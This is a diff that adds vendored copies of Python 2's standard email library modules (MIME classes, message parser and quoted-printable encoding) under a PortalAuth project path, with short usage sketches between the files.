
__all__ = ["MIMEApplication"]

from email import encoders
from email.mime.nonmultipart import MIMENonMultipart


class MIMEApplication(MIMENonMultipart):
    """Class for generating application/* MIME documents."""

    def __init__(self, _data, _subtype='octet-stream',
                 _encoder=encoders.encode_base64, **_params):
        """Create an application/* type MIME document.

        _data is a string containing the raw application data.

        _subtype is the MIME content type subtype, defaulting to
        'octet-stream'.

        _encoder is a function which will perform the actual encoding for
        transport of the application data, defaulting to base64 encoding.

        Any additional keyword arguments are passed to the base class
        constructor, which turns them into parameters on the Content-Type
        header.
        """
        if _subtype is None:
            raise TypeError('Invalid application MIME subtype')
        MIMENonMultipart.__init__(self, 'application', _subtype, **_params)
        self.set_payload(_data)
        _encoder(self)
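A minimal usage sketch for MIMEApplication (illustrative, not part of the vendored source; 'payload.bin' is a hypothetical input file):

from email.mime.application import MIMEApplication

data = open('payload.bin', 'rb').read()          # hypothetical input file
part = MIMEApplication(data)                     # default subtype: octet-stream
part.add_header('Content-Disposition', 'attachment', filename='payload.bin')
print part['Content-Type']                       # application/octet-stream
print part['Content-Transfer-Encoding']          # base64, set by the default _encoder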
73
PortalAuth/includes/scripts/libs/email/mime/audio.py
Executable file
@@ -0,0 +1,73 @@
# Copyright (C) 2001-2006 Python Software Foundation
# Author: Anthony Baxter
# Contact: email-sig@python.org

"""Class representing audio/* type MIME documents."""

__all__ = ['MIMEAudio']

import sndhdr

from cStringIO import StringIO
from email import encoders
from email.mime.nonmultipart import MIMENonMultipart


_sndhdr_MIMEmap = {'au'  : 'basic',
                   'wav' : 'x-wav',
                   'aiff': 'x-aiff',
                   'aifc': 'x-aiff',
                   }

# There are others in sndhdr that don't have MIME types. :(
# Additional ones to be added to sndhdr? midi, mp3, realaudio, wma??
def _whatsnd(data):
    """Try to identify a sound file type.

    sndhdr.what() has a pretty cruddy interface, unfortunately.  This is why
    we re-do it here.  It would be easier to reverse engineer the Unix 'file'
    command and use the standard 'magic' file, as shipped with a modern Unix.
    """
    hdr = data[:512]
    fakefile = StringIO(hdr)
    for testfn in sndhdr.tests:
        res = testfn(hdr, fakefile)
        if res is not None:
            return _sndhdr_MIMEmap.get(res[0])
    return None


class MIMEAudio(MIMENonMultipart):
    """Class for generating audio/* MIME documents."""

    def __init__(self, _audiodata, _subtype=None,
                 _encoder=encoders.encode_base64, **_params):
        """Create an audio/* type MIME document.

        _audiodata is a string containing the raw audio data.  If this data
        can be decoded by the standard Python `sndhdr' module, then the
        subtype will be automatically included in the Content-Type header.
        Otherwise, you can specify the specific audio subtype via the
        _subtype parameter.  If _subtype is not given, and no subtype can be
        guessed, a TypeError is raised.

        _encoder is a function which will perform the actual encoding for
        transport of the audio data.  It takes one argument, which is this
        Audio instance.  It should use get_payload() and set_payload() to
        change the payload to the encoded form.  It should also add any
        Content-Transfer-Encoding or other headers to the message as
        necessary.  The default encoding is Base64.

        Any additional keyword arguments are passed to the base class
        constructor, which turns them into parameters on the Content-Type
        header.
        """
        if _subtype is None:
            _subtype = _whatsnd(_audiodata)
        if _subtype is None:
            raise TypeError('Could not find audio MIME subtype')
        MIMENonMultipart.__init__(self, 'audio', _subtype, **_params)
        self.set_payload(_audiodata)
        _encoder(self)
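Illustratively, subtype detection falls back to an explicit _subtype when sndhdr cannot identify the bytes (not part of the vendored source; 'beep.wav' is a hypothetical file):

from email.mime.audio import MIMEAudio

data = open('beep.wav', 'rb').read()         # hypothetical input file
try:
    part = MIMEAudio(data)                   # subtype guessed via sndhdr.what()
except TypeError:
    part = MIMEAudio(data, _subtype='x-wav') # explicit fallback
print part['Content-Type']                   # audio/x-wav (or whatever was detected)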
26
PortalAuth/includes/scripts/libs/email/mime/base.py
Executable file
@@ -0,0 +1,26 @@
# Copyright (C) 2001-2006 Python Software Foundation
# Author: Barry Warsaw
# Contact: email-sig@python.org

"""Base class for MIME specializations."""

__all__ = ['MIMEBase']

from email import message


class MIMEBase(message.Message):
    """Base class for MIME specializations."""

    def __init__(self, _maintype, _subtype, **_params):
        """This constructor adds a Content-Type: and a MIME-Version: header.

        The Content-Type: header is taken from the _maintype and _subtype
        arguments.  Additional parameters for this header are taken from the
        keyword arguments.
        """
        message.Message.__init__(self)
        ctype = '%s/%s' % (_maintype, _subtype)
        self.add_header('Content-Type', ctype, **_params)
        self['MIME-Version'] = '1.0'
46
PortalAuth/includes/scripts/libs/email/mime/image.py
Executable file
@@ -0,0 +1,46 @@
# Copyright (C) 2001-2006 Python Software Foundation
# Author: Barry Warsaw
# Contact: email-sig@python.org

"""Class representing image/* type MIME documents."""

__all__ = ['MIMEImage']

import imghdr

from email import encoders
from email.mime.nonmultipart import MIMENonMultipart


class MIMEImage(MIMENonMultipart):
    """Class for generating image/* type MIME documents."""

    def __init__(self, _imagedata, _subtype=None,
                 _encoder=encoders.encode_base64, **_params):
        """Create an image/* type MIME document.

        _imagedata is a string containing the raw image data.  If this data
        can be decoded by the standard Python `imghdr' module, then the
        subtype will be automatically included in the Content-Type header.
        Otherwise, you can specify the specific image subtype via the _subtype
        parameter.

        _encoder is a function which will perform the actual encoding for
        transport of the image data.  It takes one argument, which is this
        Image instance.  It should use get_payload() and set_payload() to
        change the payload to the encoded form.  It should also add any
        Content-Transfer-Encoding or other headers to the message as
        necessary.  The default encoding is Base64.

        Any additional keyword arguments are passed to the base class
        constructor, which turns them into parameters on the Content-Type
        header.
        """
        if _subtype is None:
            _subtype = imghdr.what(None, _imagedata)
        if _subtype is None:
            raise TypeError('Could not guess image MIME subtype')
        MIMENonMultipart.__init__(self, 'image', _subtype, **_params)
        self.set_payload(_imagedata)
        _encoder(self)
34
PortalAuth/includes/scripts/libs/email/mime/message.py
Executable file
@@ -0,0 +1,34 @@
# Copyright (C) 2001-2006 Python Software Foundation
# Author: Barry Warsaw
# Contact: email-sig@python.org

"""Class representing message/* MIME documents."""

__all__ = ['MIMEMessage']

from email import message
from email.mime.nonmultipart import MIMENonMultipart


class MIMEMessage(MIMENonMultipart):
    """Class representing message/* MIME documents."""

    def __init__(self, _msg, _subtype='rfc822'):
        """Create a message/* type MIME document.

        _msg is a message object and must be an instance of Message, or a
        derived class of Message, otherwise a TypeError is raised.

        Optional _subtype defines the subtype of the contained message.  The
        default is "rfc822" (this is defined by the MIME standard, even though
        the term "rfc822" is technically outdated by RFC 2822).
        """
        MIMENonMultipart.__init__(self, 'message', _subtype)
        if not isinstance(_msg, message.Message):
            raise TypeError('Argument is not an instance of Message')
        # It's convenient to use this base class method.  We need to do it
        # this way or we'll get an exception
        message.Message.attach(self, _msg)
        # And be sure our default type is set correctly
        self.set_default_type('message/rfc822')
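A quick illustration of MIMEMessage wrapping a constructed (or parsed) message; not part of the vendored source:

from email.message import Message
from email.mime.message import MIMEMessage

inner = Message()
inner['Subject'] = 'inner message'
wrapper = MIMEMessage(inner)           # Content-Type: message/rfc822
print wrapper.get_default_type()       # 'message/rfc822', set by the constructor
print wrapper.is_multipart()           # True: the payload is the one-element list [inner]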
47
PortalAuth/includes/scripts/libs/email/mime/multipart.py
Executable file
@@ -0,0 +1,47 @@
# Copyright (C) 2002-2006 Python Software Foundation
# Author: Barry Warsaw
# Contact: email-sig@python.org

"""Base class for MIME multipart/* type messages."""

__all__ = ['MIMEMultipart']

from email.mime.base import MIMEBase


class MIMEMultipart(MIMEBase):
    """Base class for MIME multipart/* type messages."""

    def __init__(self, _subtype='mixed', boundary=None, _subparts=None,
                 **_params):
        """Creates a multipart/* type message.

        By default, creates a multipart/mixed message, with proper
        Content-Type and MIME-Version headers.

        _subtype is the subtype of the multipart content type, defaulting to
        `mixed'.

        boundary is the multipart boundary string.  By default it is
        calculated as needed.

        _subparts is a sequence of initial subparts for the payload.  It
        must be an iterable object, such as a list.  You can always
        attach new subparts to the message by using the attach() method.

        Additional parameters for the Content-Type header are taken from the
        keyword arguments (or passed into the _params argument).
        """
        MIMEBase.__init__(self, 'multipart', _subtype, **_params)

        # Initialise _payload to an empty list as the Message superclass's
        # implementation of is_multipart assumes that _payload is a list for
        # multipart messages.
        self._payload = []

        if _subparts:
            for p in _subparts:
                self.attach(p)
        if boundary:
            self.set_boundary(boundary)
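These classes compose as in the following sketch (illustrative, not part of the vendored source; MIMEText is defined in mime/text.py below):

from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

outer = MIMEMultipart('alternative')     # Content-Type: multipart/alternative
outer['Subject'] = 'Captive portal notice'
outer.attach(MIMEText('plain-text body', 'plain'))
outer.attach(MIMEText('<b>HTML body</b>', 'html'))

flat = outer.as_string()                 # the Generator picks a boundary while flattening
print outer.get_boundary()               # ...which is now recorded in the Content-Type header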
22
PortalAuth/includes/scripts/libs/email/mime/nonmultipart.py
Executable file
@@ -0,0 +1,22 @@
# Copyright (C) 2002-2006 Python Software Foundation
# Author: Barry Warsaw
# Contact: email-sig@python.org

"""Base class for MIME type messages that are not multipart."""

__all__ = ['MIMENonMultipart']

from email import errors
from email.mime.base import MIMEBase


class MIMENonMultipart(MIMEBase):
    """Base class for MIME type messages that are not multipart."""

    def attach(self, payload):
        # The public API prohibits attaching multiple subparts to MIMEBase
        # derived subtypes since none of them are, by definition, of content
        # type multipart/*
        raise errors.MultipartConversionError(
            'Cannot attach additional subparts to non-multipart/*')
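The guard above is easy to trip by accident; illustratively (not part of the vendored source):

from email import errors
from email.mime.text import MIMEText

part = MIMEText('hello')              # text/* parts derive from MIMENonMultipart
try:
    part.attach(MIMEText('world'))
except errors.MultipartConversionError:
    pass                              # non-multipart parts refuse subparts, per attach() above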
30
PortalAuth/includes/scripts/libs/email/mime/text.py
Executable file
@@ -0,0 +1,30 @@
# Copyright (C) 2001-2006 Python Software Foundation
# Author: Barry Warsaw
# Contact: email-sig@python.org

"""Class representing text/* type MIME documents."""

__all__ = ['MIMEText']

from email.encoders import encode_7or8bit
from email.mime.nonmultipart import MIMENonMultipart


class MIMEText(MIMENonMultipart):
    """Class for generating text/* type MIME documents."""

    def __init__(self, _text, _subtype='plain', _charset='us-ascii'):
        """Create a text/* type MIME document.

        _text is the string for this message object.

        _subtype is the MIME sub content type, defaulting to "plain".

        _charset is the character set parameter added to the Content-Type
        header.  This defaults to "us-ascii".  Note that as a side-effect, the
        Content-Transfer-Encoding header will also be set.
        """
        MIMENonMultipart.__init__(self, 'text', _subtype,
                                  **{'charset': _charset})
        self.set_payload(_text, _charset)
91
PortalAuth/includes/scripts/libs/email/parser.py
Executable file
@@ -0,0 +1,91 @@
# Copyright (C) 2001-2006 Python Software Foundation
# Author: Barry Warsaw, Thomas Wouters, Anthony Baxter
# Contact: email-sig@python.org

"""A parser of RFC 2822 and MIME email messages."""

__all__ = ['Parser', 'HeaderParser']

import warnings
from cStringIO import StringIO

from email.feedparser import FeedParser
from email.message import Message


class Parser:
    def __init__(self, *args, **kws):
        """Parser of RFC 2822 and MIME email messages.

        Creates an in-memory object tree representing the email message, which
        can then be manipulated and turned over to a Generator to return the
        textual representation of the message.

        The string must be formatted as a block of RFC 2822 headers and header
        continuation lines, optionally preceded by a `Unix-from' header.  The
        header block is terminated either by the end of the string or by a
        blank line.

        _class is the class to instantiate for new message objects when they
        must be created.  This class must have a constructor that can take
        zero arguments.  Default is Message.Message.
        """
        if len(args) >= 1:
            if '_class' in kws:
                raise TypeError("Multiple values for keyword arg '_class'")
            kws['_class'] = args[0]
        if len(args) == 2:
            if 'strict' in kws:
                raise TypeError("Multiple values for keyword arg 'strict'")
            kws['strict'] = args[1]
        if len(args) > 2:
            raise TypeError('Too many arguments')
        if '_class' in kws:
            self._class = kws['_class']
            del kws['_class']
        else:
            self._class = Message
        if 'strict' in kws:
            warnings.warn("'strict' argument is deprecated (and ignored)",
                          DeprecationWarning, 2)
            del kws['strict']
        if kws:
            raise TypeError('Unexpected keyword arguments')

    def parse(self, fp, headersonly=False):
        """Create a message structure from the data in a file.

        Reads all the data from the file and returns the root of the message
        structure.  Optional headersonly is a flag specifying whether to stop
        parsing after reading the headers or not.  The default is False,
        meaning it parses the entire contents of the file.
        """
        feedparser = FeedParser(self._class)
        if headersonly:
            feedparser._set_headersonly()
        while True:
            data = fp.read(8192)
            if not data:
                break
            feedparser.feed(data)
        return feedparser.close()

    def parsestr(self, text, headersonly=False):
        """Create a message structure from a string.

        Returns the root of the message structure.  Optional headersonly is a
        flag specifying whether to stop parsing after reading the headers or
        not.  The default is False, meaning it parses the entire contents of
        the file.
        """
        return self.parse(StringIO(text), headersonly=headersonly)


class HeaderParser(Parser):
    def parse(self, fp, headersonly=True):
        return Parser.parse(self, fp, True)

    def parsestr(self, text, headersonly=True):
        return Parser.parsestr(self, text, True)
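A round-trip sketch tying Parser back to the Message and Generator machinery above (illustrative, not part of the vendored source):

from email.parser import Parser, HeaderParser

raw = 'From: a@example.com\nSubject: hi\n\nbody text\n'
msg = Parser().parsestr(raw)
print msg['subject']                   # 'hi'
print msg.get_payload()                # 'body text\n'

# HeaderParser always stops after the header block, so for MIME input the
# body is kept as a single unparsed string payload.
hdrs = HeaderParser().parsestr(raw)
print hdrs['from']                     # 'a@example.com'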
BIN
PortalAuth/includes/scripts/libs/email/parser.pyc
Executable file
Binary file not shown.
336
PortalAuth/includes/scripts/libs/email/quoprimime.py
Executable file
@@ -0,0 +1,336 @@
# Copyright (C) 2001-2006 Python Software Foundation
# Author: Ben Gertzfield
# Contact: email-sig@python.org

"""Quoted-printable content transfer encoding per RFCs 2045-2047.

This module handles the content transfer encoding method defined in RFC 2045
to encode US ASCII-like 8-bit data called `quoted-printable'.  It is used to
safely encode text that is in a character set similar to the 7-bit US ASCII
character set, but that includes some 8-bit characters that are normally not
allowed in email bodies or headers.

Quoted-printable is very space-inefficient for encoding binary files; use the
email.base64mime module for that instead.

This module provides an interface to encode and decode both headers and bodies
with quoted-printable encoding.

RFC 2045 defines a method for including character set information in an
`encoded-word' in a header.  This method is commonly used for 8-bit real names
in To:/From:/Cc: etc. fields, as well as Subject: lines.

This module does not do the line wrapping or end-of-line character
conversion necessary for proper internationalized headers; it only
does dumb encoding and decoding.  To deal with the various line
wrapping issues, use the email.header module.
"""

__all__ = [
    'body_decode',
    'body_encode',
    'body_quopri_check',
    'body_quopri_len',
    'decode',
    'decodestring',
    'encode',
    'encodestring',
    'header_decode',
    'header_encode',
    'header_quopri_check',
    'header_quopri_len',
    'quote',
    'unquote',
    ]

import re

from string import hexdigits
from email.utils import fix_eols

CRLF = '\r\n'
NL = '\n'

# See also Charset.py
MISC_LEN = 7

hqre = re.compile(r'[^-a-zA-Z0-9!*+/ ]')
bqre = re.compile(r'[^ !-<>-~\t]')


# Helpers
def header_quopri_check(c):
    """Return True if the character should be escaped with header quopri."""
    return bool(hqre.match(c))


def body_quopri_check(c):
    """Return True if the character should be escaped with body quopri."""
    return bool(bqre.match(c))


def header_quopri_len(s):
    """Return the length of str when it is encoded with header quopri."""
    count = 0
    for c in s:
        if hqre.match(c):
            count += 3
        else:
            count += 1
    return count


def body_quopri_len(str):
    """Return the length of str when it is encoded with body quopri."""
    count = 0
    for c in str:
        if bqre.match(c):
            count += 3
        else:
            count += 1
    return count


def _max_append(L, s, maxlen, extra=''):
    if not L:
        L.append(s.lstrip())
    elif len(L[-1]) + len(s) <= maxlen:
        L[-1] += extra + s
    else:
        L.append(s.lstrip())


def unquote(s):
    """Turn a string in the form =AB to the ASCII character with value 0xab"""
    return chr(int(s[1:3], 16))


def quote(c):
    return "=%02X" % ord(c)


def header_encode(header, charset="iso-8859-1", keep_eols=False,
                  maxlinelen=76, eol=NL):
    """Encode a single header line with quoted-printable (like) encoding.

    Defined in RFC 2045, this `Q' encoding is similar to quoted-printable, but
    used specifically for email header fields to allow charsets with mostly 7
    bit characters (and some 8 bit) to remain more or less readable in non-RFC
    2045 aware mail clients.

    charset names the character set to use to encode the header.  It defaults
    to iso-8859-1.

    The resulting string will be in the form:

    "=?charset?q?I_f=E2rt_in_your_g=E8n=E8ral_dire=E7tion?\\n
      =?charset?q?Silly_=C8nglish_Kn=EEghts?="

    with each line wrapped safely at, at most, maxlinelen characters (defaults
    to 76 characters).  If maxlinelen is None, the entire string is encoded in
    one chunk with no splitting.

    End-of-line characters (\\r, \\n, \\r\\n) will be automatically converted
    to the canonical email line separator \\r\\n unless the keep_eols
    parameter is True (the default is False).

    Each line of the header will be terminated in the value of eol, which
    defaults to "\\n".  Set this to "\\r\\n" if you are using the result of
    this function directly in email.
    """
    # Return empty headers unchanged
    if not header:
        return header

    if not keep_eols:
        header = fix_eols(header)

    # Quopri encode each line, in encoded chunks no greater than maxlinelen in
    # length, after the RFC chrome is added in.
    quoted = []
    if maxlinelen is None:
        # An obnoxiously large number that's good enough
        max_encoded = 100000
    else:
        max_encoded = maxlinelen - len(charset) - MISC_LEN - 1

    for c in header:
        # Space may be represented as _ instead of =20 for readability
        if c == ' ':
            _max_append(quoted, '_', max_encoded)
        # These characters can be included verbatim
        elif not hqre.match(c):
            _max_append(quoted, c, max_encoded)
        # Otherwise, replace with hex value like =E2
        else:
            _max_append(quoted, "=%02X" % ord(c), max_encoded)

    # Now add the RFC chrome to each encoded chunk and glue the chunks
    # together.  BAW: should we be able to specify the leading whitespace in
    # the joiner?
    joiner = eol + ' '
    return joiner.join(['=?%s?q?%s?=' % (charset, line) for line in quoted])


def encode(body, binary=False, maxlinelen=76, eol=NL):
    """Encode with quoted-printable, wrapping at maxlinelen characters.

    If binary is False (the default), end-of-line characters will be converted
    to the canonical email end-of-line sequence \\r\\n.  Otherwise they will
    be left verbatim.

    Each line of encoded text will end with eol, which defaults to "\\n".  Set
    this to "\\r\\n" if you will be using the result of this function directly
    in an email.

    Each line will be wrapped at, at most, maxlinelen characters (defaults to
    76 characters).  Long lines will have the `soft linefeed' quoted-printable
    character "=" appended to them, so the decoded text will be identical to
    the original text.
    """
    if not body:
        return body

    if not binary:
        body = fix_eols(body)

    # BAW: We're accumulating the body text by string concatenation.  That
    # can't be very efficient, but I don't have time now to rewrite it.  It
    # just feels like this algorithm could be more efficient.
    encoded_body = ''
    lineno = -1
    # Preserve line endings here so we can check later to see if an eol needs
    # to be added to the output later.
    lines = body.splitlines(1)
    for line in lines:
        # But strip off line-endings for processing this line.
        if line.endswith(CRLF):
            line = line[:-2]
        elif line[-1] in CRLF:
            line = line[:-1]

        lineno += 1
        encoded_line = ''
        prev = None
        linelen = len(line)
        # Now we need to examine every character to see if it needs to be
        # quopri encoded.  BAW: again, string concatenation is inefficient.
        for j in range(linelen):
            c = line[j]
            prev = c
            if bqre.match(c):
                c = quote(c)
            elif j+1 == linelen:
                # Check for whitespace at end of line; special case
                if c not in ' \t':
                    encoded_line += c
                prev = c
                continue
            # Check to see if the line has reached its maximum length
            if len(encoded_line) + len(c) >= maxlinelen:
                encoded_body += encoded_line + '=' + eol
                encoded_line = ''
            encoded_line += c
        # Now at end of line..
        if prev and prev in ' \t':
            # Special case for whitespace at end of file
            if lineno + 1 == len(lines):
                prev = quote(prev)
                if len(encoded_line) + len(prev) > maxlinelen:
                    encoded_body += encoded_line + '=' + eol + prev
                else:
                    encoded_body += encoded_line + prev
            # Just normal whitespace at end of line
            else:
                encoded_body += encoded_line + prev + '=' + eol
            encoded_line = ''
        # Now look at the line we just finished and if it has a line ending,
        # we need to add eol to the end of the line.
        if lines[lineno].endswith(CRLF) or lines[lineno][-1] in CRLF:
            encoded_body += encoded_line + eol
        else:
            encoded_body += encoded_line
        encoded_line = ''
    return encoded_body


# For convenience and backwards compatibility w/ standard base64 module
body_encode = encode
encodestring = encode


# BAW: I'm not sure if the intent was for the signature of this function to be
# the same as base64MIME.decode() or not...
def decode(encoded, eol=NL):
    """Decode a quoted-printable string.

    Lines are separated with eol, which defaults to \\n.
    """
    if not encoded:
        return encoded
    # BAW: see comment in encode() above.  Again, we're building up the
    # decoded string with string concatenation, which could be done much more
    # efficiently.
    decoded = ''

    for line in encoded.splitlines():
        line = line.rstrip()
        if not line:
            decoded += eol
            continue

        i = 0
        n = len(line)
        while i < n:
            c = line[i]
            if c != '=':
                decoded += c
                i += 1
            # Otherwise, c == "=".  Are we at the end of the line?  If so, add
            # a soft line break.
            elif i+1 == n:
                i += 1
                continue
            # Decode if in form =AB
            elif i+2 < n and line[i+1] in hexdigits and line[i+2] in hexdigits:
                decoded += unquote(line[i:i+3])
                i += 3
            # Otherwise, not in form =AB, pass literally
            else:
                decoded += c
                i += 1

            if i == n:
                decoded += eol
    # Special case if original string did not end with eol
    if not encoded.endswith(eol) and decoded.endswith(eol):
        decoded = decoded[:-1]
    return decoded


# For convenience and backwards compatibility w/ standard base64 module
body_decode = decode
decodestring = decode


def _unquote_match(match):
    """Turn a match in the form =AB to the ASCII character with value 0xab"""
    s = match.group(0)
    return unquote(s)


# Header decoding is done a bit differently
def header_decode(s):
    """Decode a string encoded with RFC 2045 MIME header `Q' encoding.

    This function does not parse a full MIME header value encoded with
    quoted-printable (like =?iso-8859-1?q?Hello_World?=) -- please use
    the high level email.header class for that functionality.
    """
    s = s.replace('_', ' ')
    return re.sub(r'=[a-fA-F0-9]{2}', _unquote_match, s)
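The encode/decode pair above round-trips as in this sketch (illustrative, not part of the vendored source; the input is latin-1 encoded bytes):

from email import quoprimime

s = 'caf\xe9 au lait'                        # latin-1 encoded bytes
print quoprimime.encode(s)                   # 'caf=E9 au lait'
print quoprimime.decode('caf=E9 au lait')    # 'caf\xe9 au lait'
print quoprimime.header_encode('caf\xe9')    # '=?iso-8859-1?q?caf=E9?='
print quoprimime.header_decode('caf=E9')     # 'caf\xe9'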
Some files were not shown because too many files have changed in this diff.